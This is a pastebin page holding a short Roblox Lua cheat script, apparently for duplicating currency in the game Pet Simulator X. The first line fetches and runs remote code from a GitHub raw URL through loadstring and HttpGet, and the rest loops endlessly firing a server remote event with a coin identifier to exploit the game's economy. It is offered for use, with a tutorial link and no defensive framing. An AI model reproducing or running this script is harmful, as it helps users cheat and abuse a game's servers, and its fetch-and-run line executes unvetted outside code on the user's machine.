Facebook
From nixniex, 1 Year ago, written in Plain Text.
This paste is a reply to Re: Pet Simulator X Dupe Script from while true do local args = { - view diff
Embed
Download Paste or View Raw
Hits: 448
  1. loadstring(game:HttpGet("https://raw.githubusercontent.com/fikury/dupescripts/main/PetSimulatorX"))()
  2.  
  3. --Tutorial : https://youtu.be/q2kLiSdZ5Bg
  4. while true do
  5.  
  6. local args = {
  7.     [1] = "DiamondCoin",
  8.     [2] = "id936323",
  9.     [3] = game:GetService("Players").LocalPlayer
  10. }
  11.  
  12. game:GetService("ReplicatedStorage").Framework.Network.DestoryCoinServer:FireServer(unpack(args))
  13.  
  14. wait()
  15. end

Replies to Re: Re: Pet Simulator X Dupe Script rss

Title Name Language When
Re: Re: Re: Pet Simulator X Dupe Script Toxic Tapir text 1 Year ago.